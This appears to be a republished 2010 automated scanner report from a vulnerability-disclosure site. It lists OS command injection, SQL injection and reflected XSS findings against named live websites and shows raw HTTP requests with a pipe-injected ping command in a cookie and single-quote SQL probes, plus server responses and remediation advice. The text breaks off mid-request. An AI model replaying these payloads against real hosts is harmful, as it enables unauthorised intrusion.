CWE-79, CWE-89, SQL Injection, OS Command Injection

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. OS command injection

2. SQL injection

2.1. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

2.2. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

2.3. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

2.4. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

2.5. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

2.6. http://software-security-assurance.techweb.com/util/download.jhtml [REST URL parameter 2]

2.7. http://software-security-assurance.techweb.com/util/download.jhtml [Referer HTTP header]

2.8. http://redcated/SAS/jview/167465860/direct [MUID cookie]

2.9. http://redcated/SAS/jview/167465860/direct [name of an arbitrarily supplied request parameter]

2.10. https://www.insightexpress.com/ix/CreateNewAccount.asp [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://altfarm.mediaplex.com/ad/js/15017-106408-3768-0 [name of an arbitrarily supplied request parameter]

3.2. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]

3.3. http://analytics.informationweek.com/index/caslogin [REST URL parameter 1]

3.4. http://analytics.informationweek.com/index/caslogin [REST URL parameter 2]

3.5. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 1]

3.6. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 2]

3.7. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 3]

3.8. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

3.9. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

3.10. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

3.11. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

3.12. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

3.13. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]

3.14. http://core.insightexpressai.com/adserver/invites/Reconcile.aspx [bannerID parameter]

3.15. http://core.insightexpressai.com/adserver/invites/Reconcile.aspx [campaignID parameter]

3.16. http://digg.com/submit [REST URL parameter 1]

3.17. http://dockets.justia.com/search [REST URL parameter 1]

3.18. http://dockets.justia.com/search [name of an arbitrarily supplied request parameter]

3.19. http://image.providesupport.com/js/valera/safe-standard.js [REST URL parameter 1]

3.20. http://image.providesupport.com/js/valera/safe-standard.js [REST URL parameter 2]

3.21. http://redcated/DWA/jview/197028858/direct/01/122917943 [REST URL parameter 4]

3.22. http://redcated/DWA/jview/197028859/direct/01/122918379 [REST URL parameter 4]

3.23. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1]

3.24. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1]

3.25. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2]

3.26. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2]

3.27. http://www.addthis.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]

3.28. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]

3.29. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]

3.30. http://www.darkreading.com/btgcommunity/forum.jspa [name of an arbitrarily supplied request parameter]

3.31. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]

3.32. https://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]

3.33. http://www.lightreading.com/quote.asp [name of an arbitrarily supplied request parameter]

3.34. http://www.techcareers.com/ [name of an arbitrarily supplied request parameter]

3.35. http://www.techcareers.com/ [name of an arbitrarily supplied request parameter]

3.36. http://www.techweb.com/css/everything_packed.css [REST URL parameter 1]

3.37. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

3.38. http://login.cmp.com/user/login.jhtml [User-Agent HTTP header]

3.39. http://login.cmp.com/user/register.jhtml [User-Agent HTTP header]

3.40. http://windows7.informationweek.com/ [User-Agent HTTP header]

3.41. http://www.contentinople.com/author.asp [User-Agent HTTP header]

3.42. http://www.darkreading.com/blog/archives/evil_bytes/index.html [User-Agent HTTP header]

3.43. http://www.gamasutra.com/jobs/event_board.php [User-Agent HTTP header]

3.44. http://www.internetevolution.com/author.asp [User-Agent HTTP header]

3.45. http://www.lightreading.com/ad_redirect.asp [User-Agent HTTP header]

3.46. http://www.lightreading.com/archives.asp [User-Agent HTTP header]

3.47. http://www.lightreading.com/blog.asp [User-Agent HTTP header]

3.48. http://www.lightreading.com/calendar_webinars.asp [User-Agent HTTP header]

3.49. http://www.lightreading.com/document.asp [User-Agent HTTP header]

3.50. http://www.lightreading.com/email.asp [User-Agent HTTP header]

3.51. http://www.lightreading.com/lg_redirect.asp [User-Agent HTTP header]

3.52. http://www.lightreading.com/live/event_information.asp [User-Agent HTTP header]

3.53. http://www.lightreading.com/login.asp [User-Agent HTTP header]

3.54. http://www.lightreading.com/message.asp [User-Agent HTTP header]

3.55. http://www.lightreading.com/messages.asp [User-Agent HTTP header]

3.56. http://www.lightreading.com/profile.asp [User-Agent HTTP header]

3.57. http://www.lightreading.com/quote.asp [User-Agent HTTP header]

3.58. http://www.lightreading.com/register.asp [User-Agent HTTP header]

3.59. http://www.lightreading.com/topics.asp [User-Agent HTTP header]

3.60. http://www.lightreading.com/webinar.asp [User-Agent HTTP header]

3.61. http://www.lightreading.com/webinar_archives.asp [User-Agent HTTP header]

3.62. http://www.lightreading.com/webinars.asp [User-Agent HTTP header]

3.63. http://www.ondemanditgovernance.techweb.com/util/download.jhtml [User-Agent HTTP header]

3.64. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

3.65. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

3.66. http://ar.voicefive.com/b/node_rcAll.pli [BMX_G cookie]

3.67. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

3.68. http://ar.voicefive.com/b/node_rcAll.pli [ar_70821733 cookie]

3.69. http://ar.voicefive.com/b/node_rcAll.pli [ar_p43112268 cookie]

3.70. http://ar.voicefive.com/b/node_rcAll.pli [ar_p70821733 cookie]

3.71. http://ar.voicefive.com/b/node_rcAll.pli [ar_p72213098 cookie]

3.72. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76230671 cookie]

3.73. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76459327 cookie]

3.74. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76910469 cookie]

3.75. http://image.providesupport.com/js/valera/safe-standard.js [vsid cookie]



1. OS command injection  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insightexpress.com
Path:   /search.asp

Issue detail

The mypets cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the mypets cookie. The application took 68135 milliseconds to respond to the request, compared with 10786 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /search.asp HTTP/1.1
Host: www.insightexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mypets=-1c|ping%20-n%2020%20127.0.0.1||x; __utmz=184297086.1292122414.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184297086.1265186133.1292122414.1292122414.1292122544.2; __utmc=184297086; __utmb=184297086.8.10.1292122544;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14425
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR ADMa OUR STP STA"
Date: Sun, 12 Dec 2010 03:39:51 GMT
Connection: close


<HTML>


<head>
   <title>Search Results</title>    
   <meta name="description" content="Our customer service group is a team of research and customer service professionals, available to answer your
...[SNIP]...

2. SQL injection  previous  next
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The creativeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the creativeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 03:10:37 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208'' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:37 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19663

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

2.2. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The esi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true'&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 03:09:58 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true''&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:09:58 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19663

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

2.3. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208&1'=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 03:13:31 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208&1''=1 HTTP/1.1
